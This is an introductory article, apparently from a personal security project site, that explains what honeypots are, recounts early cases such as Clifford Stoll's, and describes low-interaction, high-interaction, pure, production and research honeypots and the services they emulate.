What is a Honeypot?
A honeypot is typically something (or someone) that is designed to lure a target and extract information. For this project, my targets are threat actors (cyber attackers), and I'm extracting their tactics, techniques, and procedures (TTPs).
Honeypots -- or honey traps -- are steeped in history. A popular espionage technique; enemy targets were lured into extracting information and secrets (think James Bond style). The trap-settters gained powerful intelligence, leveraged to combat their enemies.
In computer security, a honeypot is a device that's designed to look like a real system (e.g. a computer, server, network, etc) -- but is actually rigged. Threat actors are lured into attacking the honeypot, often believing they have compromised the system. In reality, the security community gains valuable insights into attacker techniques and behaviours. This knowledge -- or threat intelligence -- is used to strengthen the security of computer systems and networks.
A brief history of computing honeypots
In 1986, Clifford Stoll worked as a systems administrator at the Lawrence Berkeley National Laboratory (LBNL). Stoll was trying to resolve a 75-cents accounting error in the computer usage accounts. He traced the error to an unauthorised user that used 9 seconds of computing time without paying for it.
Determined to catch the unauthorised user, Stoll setup an elaborate system of terminals and teleprinters -- a target the user couldn't resist breaking into. Stoll's investigation ultimately became the first, modern-day, documented case of catching a threat actor with a honeypot. The threat actor turned out to be a tenacious KGB recruit called Markus Hess.
Stoll is a prolific note-taker, and recorded intricate details of his honeypot threat-hunting investigation. Leading Stoll to write a fascinating paper: Stalking the wily hacker, published in 1988, and book: The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer Espionage, published in 1989. They're engaging and captivating reads (if you'll pardon the pun) about honeypots -- even for readers that are less interested in the technical aspects.
In 1991, Bill Chewick, and his colleagues at AT&T, deployed a series of baits and traps to detect a persistent threat actor that showed a keen interest in military targets. Chewick later published a paper, detailing their honeypot's observations, titled: An Evening with Berferd: In Which a Cracker is Lured, Endured, and Studied published a paper entitled.
Types of honeypots
Honeypots come in many different types and styles. From physical to software, and from low-interaction to high-interaction. Some honeypots will emulate a specific service (e.g. SSH) while other mimic an entire operating system (e.g. Windows).
In terms of capabilities, there are typically 3 types of honeypots:
When it comes to deployment purpose, there are typically 2 types of honeypots:
Honeypots that imitate one specific system (such as SSH), and offer limited capabilities, are called low-interaction honeypots. They're ideal for simulating common attack vectors that are frequently requested.
What do we mean by "limited capabilities"?
Well, take SSH (Secure SHell), for example. It's a secure communications protocol used to interact with an operating system. So, an SSH server will typically offer a wide range of services and commands. That's a lot of functionality needed for a convincing honeypot. So, low-interaction honeypots are often designed to emulate commonly used commands, such as
ls (list directory contents),
pwd (print working directory), etc.
The advantages of low-interaction honeypots are that they're usually easier to manage and deploy. They're also less risky because there are less things to go wrong (such as the honeypot system itself being compromised).
Low-interaction honeypots are great for catching brute-force attacks that often originate from botnets. Low-interaction honeypots are also good for catching malware that botnets deploy to exploit systems.
However, the disadvantages of low-interaction honeypots are that attackers are more likely to detect them. This is because it's unusual for a live system to have such limited functionality -- a red flag for attackers.
Honeypots that emulate a range of systems, and sometimes offer near-full capabilities, are called high-interaction honeypots.
By "near-full capabilities" we mean that the range of emulated systems is almost that of a fully-fledged operating system.
Because high-interaction honeypots have a greater range of services available, attackers may try to perform more complex manoeuvrers. This might result in an attacker gaining root access to a system -- valuable threat intelligence.
The advantages of high-interaction honeypots are that they can appear more convincing to attackers and, due to their range of services, produce richer information.
The disadvantages of high-interaction honeypots are that they're harder and more complex to maintain and deploy. High-interaction honeypots also come with increased risks, since there are more things to go wrong, and, potentially, more aspects that could genuinely become compromised.
Honeypots that are a fully-fledged production system are called pure honeypots.
Pure honeypots are often a standard operating system (such as Windows, Ubuntu, Macos) running in a controlled environment (such a virtual machine). Typically, pure honeypots will be very carefully monitored to ensure they don't become genuine targets.
Pure honeypots are the most complex and difficult to maintain -- and they come with high risks. However, they appear the most convincing to attackers since they are actually inside a genuine system.
Honeypots deployed with the goal of hardening an organisation's core environment are called production honeypots.
Production honeypots usually have a number of key purposes. They can lure attacks away from production systems -- acting as a distraction, offering more valuable content. They can also provide valuable information for intrusion detection systems (IDS) and security information and event management (SIEM) technology.
Honeypots deployed with the goal of gathering, and sometimes discovering, intelligence about threat actors' (such as TTPs) are called research honeypots.
Research honeypots can be pure, high-interaction, or low-interaction, depending on the research questions and aims. Research honeypots may run for long periods of time during longitudinal measurement studies. Research honeypots may also analyse specific threats or observe threat actor methodology and trends.
Research honeypots are popular with threat hunters -- tasked with identifying and reporting empirical threat intelligence to strengthen security. A research honeypot's vicarious exploitations give security defenders the upper-hand against threat actors.
There are many services that can be imitated by honeypots. These include:
I've also curated a list of awesome honeypots.
Popular databases -- such as MySQL, PostgreSQL, MongoDB, Redis, etc -- are common targets for threat actors. So, honeypots that emulate data storage services area a great way to analyse potential vulnerabilities and exploits.
First developed in 1991, SSH (or Secure SHell) is a widely-used cryptographic network protocol for communicating with remote systems. Due to its popularity, and access to the entire system, SSH is a high-value target for threat actors.
Since Tim Berners-Lee's original concept for the World Wide Web in 1989 (see his memorandum, titled Information Management: A Proposal, for a system called "Mesh"), the web has become ubiquitous in our lives. The web's popularity means it's also a key attack vector for threat actors. From vulnerable WordPress plug-ins to brute-force weak-authentication -- the web is crawling with attackers. So, web honeypots can help us understand where the weak spots are, and how to improve security.
For further reading on honeypots see:
- Definition: honeypot (computing) from TechTarget
- Honeypot from Wikipedia
- the resources section of this website.
Image credit: "Honey jar" by Nic McPhee, flickr.com/photos/nicmcphee/411317929